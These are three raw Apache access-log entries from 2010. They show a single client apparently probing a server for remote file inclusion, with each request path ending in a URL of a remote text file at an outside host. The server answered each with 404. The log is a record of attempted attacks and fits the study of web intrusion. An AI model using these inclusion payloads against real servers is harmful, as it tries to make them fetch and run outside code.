64.15.158.246 - - [08/Feb/2010:11:40:15 -0800] "GET /logs/access_091221.log/%3Chr%3Ehttp://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.15.158.246 - - [08/Feb/2010:11:40:16 -0800] "GET /%3Cp%3EThe%20requested%20URL%20/bbs/bugz/joomla.txt%20was%20not%20found%20on%20this%20server.%3C/p%3Ehttp://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.15.158.246 - - [08/Feb/2010:11:40:16 -0800] "GET /logs/access_091221.log/%3Caddress%3EApache/2.0.59%20(Unix)%20DAV/2%20PHP/4.4.4%20Server%20at%20www1.goldping.com%20Port%2080%3C/address%3Ehttp://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
